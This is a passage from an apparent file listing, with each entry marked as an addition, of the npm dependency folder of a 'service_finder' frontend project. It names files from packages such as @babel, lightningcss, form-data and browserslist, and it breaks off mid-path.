+/opt/service_finder/frontend/node_modules/chart.js/auto/auto.js +/opt/service_finder/frontend/node_modules/lightningcss +/opt/service_finder/frontend/node_modules/lightningcss/node +/opt/service_finder/frontend/node_modules/lightningcss/node/composeVisitors.js +/opt/service_finder/frontend/node_modules/lightningcss/node/index.d.ts +/opt/service_finder/frontend/node_modules/lightningcss/node/targets.js.flow +/opt/service_finder/frontend/node_modules/lightningcss/node/flags.js +/opt/service_finder/frontend/node_modules/lightningcss/node/ast.d.ts +/opt/service_finder/frontend/node_modules/lightningcss/node/ast.js.flow +/opt/service_finder/frontend/node_modules/lightningcss/node/targets.d.ts +/opt/service_finder/frontend/node_modules/lightningcss/node/browserslistToTargets.js +/opt/service_finder/frontend/node_modules/lightningcss/node/index.js.flow +/opt/service_finder/frontend/node_modules/lightningcss/node/index.js +/opt/service_finder/frontend/node_modules/lightningcss/node/index.mjs +/opt/service_finder/frontend/node_modules/lightningcss/package.json +/opt/service_finder/frontend/node_modules/lightningcss/LICENSE +/opt/service_finder/frontend/node_modules/lightningcss/README.md +/opt/service_finder/frontend/node_modules/form-data +/opt/service_finder/frontend/node_modules/form-data/License +/opt/service_finder/frontend/node_modules/form-data/index.d.ts +/opt/service_finder/frontend/node_modules/form-data/lib +/opt/service_finder/frontend/node_modules/form-data/lib/browser.js +/opt/service_finder/frontend/node_modules/form-data/lib/populate.js +/opt/service_finder/frontend/node_modules/form-data/lib/form_data.js +/opt/service_finder/frontend/node_modules/form-data/package.json +/opt/service_finder/frontend/node_modules/form-data/README.md +/opt/service_finder/frontend/node_modules/form-data/CHANGELOG.md +/opt/service_finder/frontend/node_modules/graceful-fs +/opt/service_finder/frontend/node_modules/graceful-fs/package.json +/opt/service_finder/frontend/node_modules/graceful-fs/polyfills.js +/opt/service_finder/frontend/node_modules/graceful-fs/clone.js +/opt/service_finder/frontend/node_modules/graceful-fs/legacy-streams.js +/opt/service_finder/frontend/node_modules/graceful-fs/LICENSE +/opt/service_finder/frontend/node_modules/graceful-fs/README.md +/opt/service_finder/frontend/node_modules/graceful-fs/graceful-fs.js +/opt/service_finder/frontend/node_modules/node-releases +/opt/service_finder/frontend/node_modules/node-releases/package.json +/opt/service_finder/frontend/node_modules/node-releases/data +/opt/service_finder/frontend/node_modules/node-releases/data/processed +/opt/service_finder/frontend/node_modules/node-releases/data/processed/envs.json +/opt/service_finder/frontend/node_modules/node-releases/data/release-schedule +/opt/service_finder/frontend/node_modules/node-releases/data/release-schedule/release-schedule.json +/opt/service_finder/frontend/node_modules/node-releases/LICENSE +/opt/service_finder/frontend/node_modules/node-releases/README.md +/opt/service_finder/frontend/node_modules/@babel +/opt/service_finder/frontend/node_modules/@babel/helper-string-parser +/opt/service_finder/frontend/node_modules/@babel/helper-string-parser/lib +/opt/service_finder/frontend/node_modules/@babel/helper-string-parser/lib/index.js +/opt/service_finder/frontend/node_modules/@babel/helper-string-parser/lib/index.js.map +/opt/service_finder/frontend/node_modules/@babel/helper-string-parser/package.json +/opt/service_finder/frontend/node_modules/@babel/helper-string-parser/LICENSE +/opt/service_finder/frontend/node_modules/@babel/helper-string-parser/README.md +/opt/service_finder/frontend/node_modules/@babel/generator +/opt/service_finder/frontend/node_modules/@babel/generator/lib +/opt/service_finder/frontend/node_modules/@babel/generator/lib/token-map.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/node +/opt/service_finder/frontend/node_modules/@babel/generator/lib/node/parentheses.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/node/whitespace.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/node/parentheses.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/node/index.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/node/whitespace.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/node/index.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/buffer.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/token-map.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/source-map.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/methods.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/deprecated.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/jsx.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/statements.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/expressions.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/modules.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/flow.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/classes.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/deprecated.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/template-literals.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/jsx.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/modules.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/classes.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/expressions.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/index.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/template-literals.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/flow.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/base.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/typescript.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/types.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/types.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/base.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/statements.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/typescript.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/index.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/generators/methods.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/source-map.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/index.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/printer.js +/opt/service_finder/frontend/node_modules/@babel/generator/lib/printer.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/buffer.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/lib/index.js.map +/opt/service_finder/frontend/node_modules/@babel/generator/package.json +/opt/service_finder/frontend/node_modules/@babel/generator/LICENSE +/opt/service_finder/frontend/node_modules/@babel/generator/README.md +/opt/service_finder/frontend/node_modules/@babel/types +/opt/service_finder/frontend/node_modules/@babel/types/lib +/opt/service_finder/frontend/node_modules/@babel/types/lib/retrievers +/opt/service_finder/frontend/node_modules/@babel/types/lib/retrievers/getOuterBindingIdentifiers.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/retrievers/getBindingIdentifiers.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/retrievers/getAssignmentIdentifiers.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/retrievers/getFunctionName.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/retrievers/getAssignmentIdentifiers.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/retrievers/getOuterBindingIdentifiers.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/retrievers/getFunctionName.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/retrievers/getBindingIdentifiers.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone/cloneDeepWithoutLoc.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone/cloneDeepWithoutLoc.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone/clone.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone/cloneNode.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone/cloneDeep.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone/clone.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone/cloneNode.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone/cloneDeep.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone/cloneWithoutLoc.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/clone/cloneWithoutLoc.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/inheritsComments.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/removeComments.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/inheritTrailingComments.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/inheritTrailingComments.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/inheritInnerComments.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/inheritLeadingComments.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/addComments.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/addComment.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/removeComments.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/inheritLeadingComments.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/inheritInnerComments.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/inheritsComments.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/addComments.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/comments/addComment.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/index.d.ts +/opt/service_finder/frontend/node_modules/@babel/types/lib/utils +/opt/service_finder/frontend/node_modules/@babel/types/lib/utils/deprecationWarning.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/utils/shallowEqual.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/utils/react +/opt/service_finder/frontend/node_modules/@babel/types/lib/utils/react/cleanJSXElementLiteralChild.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/utils/react/cleanJSXElementLiteralChild.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/utils/shallowEqual.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/utils/inherit.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/utils/deprecationWarning.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/utils/inherit.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/gatherSequenceExpressions.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toExpression.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toIdentifier.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toKeyAlias.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toBindingIdentifierName.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toBlock.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/ensureBlock.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/gatherSequenceExpressions.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toSequenceExpression.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toBlock.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toSequenceExpression.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toStatement.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toExpression.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toComputedKey.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toComputedKey.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/valueToNode.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toBindingIdentifierName.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toStatement.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/valueToNode.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/ensureBlock.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toKeyAlias.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/converters/toIdentifier.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/traverse +/opt/service_finder/frontend/node_modules/@babel/types/lib/traverse/traverseFast.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/traverse/traverse.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/traverse/traverseFast.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/traverse/traverse.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/index-legacy.d.ts +/opt/service_finder/frontend/node_modules/@babel/types/lib/asserts +/opt/service_finder/frontend/node_modules/@babel/types/lib/asserts/assertNode.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/asserts/assertNode.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/asserts/generated +/opt/service_finder/frontend/node_modules/@babel/types/lib/asserts/generated/index.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/asserts/generated/index.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/typescript +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/typescript/removeTypeDuplicates.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/typescript/removeTypeDuplicates.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/appendToMemberExpression.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/inherits.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/appendToMemberExpression.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/removePropertiesDeep.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/removePropertiesDeep.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/removeProperties.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/flow +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/flow/removeTypeDuplicates.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/flow/removeTypeDuplicates.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/prependToMemberExpression.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/prependToMemberExpression.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/inherits.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/modifications/removeProperties.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/index.js.flow +/opt/service_finder/frontend/node_modules/@babel/types/lib/constants +/opt/service_finder/frontend/node_modules/@babel/types/lib/constants/index.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/constants/index.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/constants/generated +/opt/service_finder/frontend/node_modules/@babel/types/lib/constants/generated/index.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/constants/generated/index.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/index.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/typescript +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/typescript/createTSUnionType.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/typescript/createTSUnionType.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/validateNode.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/react +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/react/buildChildren.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/react/buildChildren.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/productions.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/productions.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/flow +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/flow/createTypeAnnotationBasedOnTypeof.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/flow/createFlowUnionType.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/flow/createFlowUnionType.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/flow/createTypeAnnotationBasedOnTypeof.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/validateNode.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/generated +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/generated/lowercase.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/generated/uppercase.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/generated/uppercase.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/generated/index.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/generated/index.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/builders/generated/lowercase.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/jsx.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/experimental.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/experimental.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/misc.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/core.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/flow.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/deprecated-aliases.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/utils.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/jsx.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/placeholders.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/core.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/deprecated-aliases.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/index.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/misc.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/placeholders.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/flow.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/typescript.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/typescript.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/utils.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/definitions/index.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/ast-types +/opt/service_finder/frontend/node_modules/@babel/types/lib/ast-types/generated +/opt/service_finder/frontend/node_modules/@babel/types/lib/ast-types/generated/index.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/ast-types/generated/index.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isBinding.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/is.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isValidIdentifier.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isLet.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isScope.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isValidES3Identifier.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isBlockScoped.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/validate.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isNodesEquivalent.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isType.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isNode.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/matchesPattern.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isPlaceholderType.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/react +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/react/isCompatTag.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/react/isReactComponent.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/react/isCompatTag.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/react/isReactComponent.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isSpecifierDefault.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isBlockScoped.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/buildMatchMemberExpression.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isValidES3Identifier.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isBinding.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isNode.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isNodesEquivalent.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isImmutable.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isLet.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isType.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isPlaceholderType.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isVar.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isReferenced.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isScope.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/validate.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isValidIdentifier.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/buildMatchMemberExpression.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isSpecifierDefault.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isReferenced.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isVar.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/isImmutable.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/generated +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/generated/index.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/generated/index.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/matchesPattern.js.map +/opt/service_finder/frontend/node_modules/@babel/types/lib/validators/is.js +/opt/service_finder/frontend/node_modules/@babel/types/lib/index.js.map +/opt/service_finder/frontend/node_modules/@babel/types/package.json +/opt/service_finder/frontend/node_modules/@babel/types/LICENSE +/opt/service_finder/frontend/node_modules/@babel/types/README.md +/opt/service_finder/frontend/node_modules/@babel/parser +/opt/service_finder/frontend/node_modules/@babel/parser/lib +/opt/service_finder/frontend/node_modules/@babel/parser/lib/index.js +/opt/service_finder/frontend/node_modules/@babel/parser/lib/index.js.map +/opt/service_finder/frontend/node_modules/@babel/parser/package.json +/opt/service_finder/frontend/node_modules/@babel/parser/bin +/opt/service_finder/frontend/node_modules/@babel/parser/bin/babel-parser.js +/opt/service_finder/frontend/node_modules/@babel/parser/LICENSE +/opt/service_finder/frontend/node_modules/@babel/parser/README.md +/opt/service_finder/frontend/node_modules/@babel/parser/CHANGELOG.md +/opt/service_finder/frontend/node_modules/@babel/parser/typings +/opt/service_finder/frontend/node_modules/@babel/parser/typings/babel-parser.d.ts +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier/lib +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier/lib/identifier.js.map +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier/lib/keyword.js +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier/lib/index.js +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier/lib/identifier.js +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier/lib/keyword.js.map +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier/lib/index.js.map +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier/package.json +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier/LICENSE +/opt/service_finder/frontend/node_modules/@babel/helper-validator-identifier/README.md +/opt/service_finder/frontend/node_modules/electron-to-chromium +/opt/service_finder/frontend/node_modules/electron-to-chromium/versions.js +/opt/service_finder/frontend/node_modules/electron-to-chromium/full-chromium-versions.json +/opt/service_finder/frontend/node_modules/electron-to-chromium/full-versions.json +/opt/service_finder/frontend/node_modules/electron-to-chromium/package.json +/opt/service_finder/frontend/node_modules/electron-to-chromium/full-versions.js +/opt/service_finder/frontend/node_modules/electron-to-chromium/LICENSE +/opt/service_finder/frontend/node_modules/electron-to-chromium/versions.json +/opt/service_finder/frontend/node_modules/electron-to-chromium/index.js +/opt/service_finder/frontend/node_modules/electron-to-chromium/chromium-versions.json +/opt/service_finder/frontend/node_modules/electron-to-chromium/chromium-versions.js +/opt/service_finder/frontend/node_modules/electron-to-chromium/README.md +/opt/service_finder/frontend/node_modules/electron-to-chromium/full-chromium-versions.js +/opt/service_finder/frontend/node_modules/webpack-virtual-modules +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/src +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/src/index.ts +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/src/virtual-stats.ts +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/lib +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/lib/virtual-stats.js.map +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/lib/index.d.ts +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/lib/virtual-stats.js +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/lib/index.js +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/lib/virtual-stats.d.ts +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/lib/index.js.map +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/package.json +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/LICENSE +/opt/service_finder/frontend/node_modules/webpack-virtual-modules/README.md +/opt/service_finder/frontend/node_modules/mime-types +/opt/service_finder/frontend/node_modules/mime-types/HISTORY.md +/opt/service_finder/frontend/node_modules/mime-types/package.json +/opt/service_finder/frontend/node_modules/mime-types/LICENSE +/opt/service_finder/frontend/node_modules/mime-types/index.js +/opt/service_finder/frontend/node_modules/mime-types/README.md +/opt/service_finder/frontend/node_modules/has-tostringtag +/opt/service_finder/frontend/node_modules/has-tostringtag/shams.js +/opt/service_finder/frontend/node_modules/has-tostringtag/index.d.ts +/opt/service_finder/frontend/node_modules/has-tostringtag/shams.d.ts +/opt/service_finder/frontend/node_modules/has-tostringtag/test +/opt/service_finder/frontend/node_modules/has-tostringtag/test/index.js +/opt/service_finder/frontend/node_modules/has-tostringtag/test/tests.js +/opt/service_finder/frontend/node_modules/has-tostringtag/test/shams +/opt/service_finder/frontend/node_modules/has-tostringtag/test/shams/get-own-property-symbols.js +/opt/service_finder/frontend/node_modules/has-tostringtag/test/shams/core-js.js +/opt/service_finder/frontend/node_modules/has-tostringtag/tsconfig.json +/opt/service_finder/frontend/node_modules/has-tostringtag/package.json +/opt/service_finder/frontend/node_modules/has-tostringtag/.github +/opt/service_finder/frontend/node_modules/has-tostringtag/.github/FUNDING.yml +/opt/service_finder/frontend/node_modules/has-tostringtag/.eslintrc +/opt/service_finder/frontend/node_modules/has-tostringtag/LICENSE +/opt/service_finder/frontend/node_modules/has-tostringtag/index.js +/opt/service_finder/frontend/node_modules/has-tostringtag/.nycrc +/opt/service_finder/frontend/node_modules/has-tostringtag/README.md +/opt/service_finder/frontend/node_modules/has-tostringtag/CHANGELOG.md +/opt/service_finder/frontend/node_modules/picocolors +/opt/service_finder/frontend/node_modules/picocolors/picocolors.browser.js +/opt/service_finder/frontend/node_modules/picocolors/picocolors.d.ts +/opt/service_finder/frontend/node_modules/picocolors/types.d.ts +/opt/service_finder/frontend/node_modules/picocolors/package.json +/opt/service_finder/frontend/node_modules/picocolors/picocolors.js +/opt/service_finder/frontend/node_modules/picocolors/LICENSE +/opt/service_finder/frontend/node_modules/picocolors/README.md +/opt/service_finder/frontend/node_modules/browserslist +/opt/service_finder/frontend/node_modules/browserslist/error.js +/opt/service_finder/frontend/node_modules/browserslist/browser.js +/opt/service_finder/frontend/node_modules/browserslist/index.d.ts +/opt/service_finder/frontend/node_modules/browserslist/node.js +/opt/service_finder/frontend/node_modules/browserslist/package.json +/opt/service_finder/frontend/node_modules/browserslist/LICENSE +/opt/service_finder/frontend/node_modules/browserslist/index.js +/opt/service_finder/frontend/node_modules/browserslist/parse.js +/opt/service_finder/frontend/node_modules/browserslist/error.d.ts +/opt/service_finder/frontend/node_modules/browserslist/README.md +/opt/service_finder/frontend/node_modules/browserslist/cli.js +/opt/service_finder/frontend/node_modules/unplugin +/opt/service_finder/frontend/node_modules/unplugin/package.json +/opt/service_finder/frontend/node_modules/unplugin/dist +/opt/service_finder/frontend/node_modules/unplugin/dist/utils-BosfZ0pB.js +/opt/service_finder/frontend/node_modules/unplugin/dist/webpack-like-DDVwPJ4e.cjs +/opt/service_finder/frontend/node_modules/unplugin/dist/index.d.ts +/opt/service_finder/frontend/node_modules/unplugin/dist/webpack-like-DFGTNSuV.js +/opt/service_finder/frontend/node_modules/unplugin/dist/index.cjs +/opt/service_finder/frontend/node_modules/unplugin/dist/context-CQfDPcdE.cjs +/opt/service_finder/frontend/node_modules/unplugin/dist/context-CrbHoDid.cjs +/opt/service_finder/frontend/node_modules/unplugin/dist/utils-CJMEEaD7.cjs +/opt/service_finder/frontend/node_modules/unplugin/dist/index.js +/opt/service_finder/frontend/node_modules/unplugin/dist/context-OCFO8EW1.js +/opt/service_finder/frontend/node_modules/unplugin/dist/context-DkYlx1xL.js +/opt/service_finder/frontend/node_modules/unplugin/dist/webpack 